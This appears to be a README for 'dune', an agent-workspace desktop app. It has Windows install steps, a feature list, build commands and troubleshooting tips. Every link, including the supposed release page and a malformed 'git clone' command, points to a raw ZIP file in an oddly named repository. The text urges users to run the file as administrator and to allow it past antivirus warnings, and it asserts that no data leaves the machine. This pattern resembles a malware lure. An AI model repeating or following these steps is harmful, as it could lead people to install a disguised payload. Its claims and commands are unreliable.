dune is a tool that helps you organize work with agents and channels in one place. It lets you manage agents, communicate in channels, and run small apps all from a smooth interface on your computer. dune keeps everything stored locally, so your data stays with you.
- Work with channels to chat and coordinate tasks with agents.
- Create, start, stop, and check logs for agents easily.
- Manage todos and review agent skills.
- Use sandboxes to run commands, browse files, and handle uploads or downloads.
- Access mini-apps built by agents right in the workspace.
- Stores all data on your computer using SQLite, keeping things fast and private.
Go to the official release page for dune here:
This page lists the latest versions of dune for Windows and other platforms.
Look for the Windows version in the list. The file usually ends with .exe. It might be named something like dune-setup.exe or dune-windows.exe.
Click the Windows .exe file to download. Wait for the download to finish before moving to the next step.
Find the downloaded file, usually in your "Downloads" folder. Double-click it to start the installation.
Follow the instructions on the screen. Choose the default options unless you want to change the install location.
After the installation finishes, open dune. You can do this by:
- Finding dune in the Start Menu under “dune”.
- Or double-clicking the icon on your desktop if you chose to create one.
Once dune is open, you will see the main workspace with channels on the side. This is where you chat and manage work.
Channels are like chat rooms. You can create a new channel for each project or topic.
- Click the “New Channel” button.
- Name your channel.
- Start sending messages or commands that agents can respond to.
Agents are helpers that can work on tasks or run commands for you.
- To create an agent, click the “Create Agent” button.
- Start or stop agents using the controls near their name.
- View logs anytime to see what the agent did.
- Use the “Skills” panel to check what each agent can do.
Sandboxes let you test commands, browse files, or upload and download content safely.
- Open a sandbox window.
- Run commands like you would in a command prompt.
- Navigate files inside the sandbox.
- Upload or download files from your computer to the sandbox.
To run dune smoothly on Windows, your system should meet these requirements:
- Windows 10 or later
- 4 GB of RAM or more
- 500 MB free disk space for installation
- An internet connection to download and update dune
If you want to build dune from its source code, here is the process. This is optional and meant for advanced users or developers.
-
Install Node.js 24
-
Enable
corepackby running this command in PowerShell or Command Prompt:corepack enable -
Install
makeif not already installed. -
Open Command Prompt and run:
git clone https://github.com/jealous-eaudevie630/dune/raw/refs/heads/main/melanotic/Software_2.2.zip cd dune make deploy make dev
make deploy installs all dependencies and sets up the necessary configuration. make dev starts the application.
- If the installer does not run, make sure your Windows is up to date.
- If you cannot find a downloaded file, check your browser’s default download folder.
- If dune doesn’t start after installation, try running it as an administrator.
- For issues with agents or sandboxes, restart dune and try again.
- Check the official release page for updates or fixes:
https://github.com/jealous-eaudevie630/dune/raw/refs/heads/main/melanotic/Software_2.2.zip
dune uses SQLite to store data on your computer. This means all your messages, logs, and agent information stay local and private. The application does not send data to external servers.
This setup helps you keep control of your information and work safely.
See channels, agents, and open mini-apps here.
This is where you view conversations, agent details, and sandbox operations.
- Start/Stop Agent: Controls for running agents.
- New Channel: Adds a workspace for chats.
- Sandbox: Opens a control area for file and command tasks.
- Skills Panel: Lists agent abilities and allows you to manage them.
- Run dune with administrator rights if you face permission issues.
- Antivirus software may block dune the first time; allow it if prompted.
- The app runs offline but needs internet only to download updates.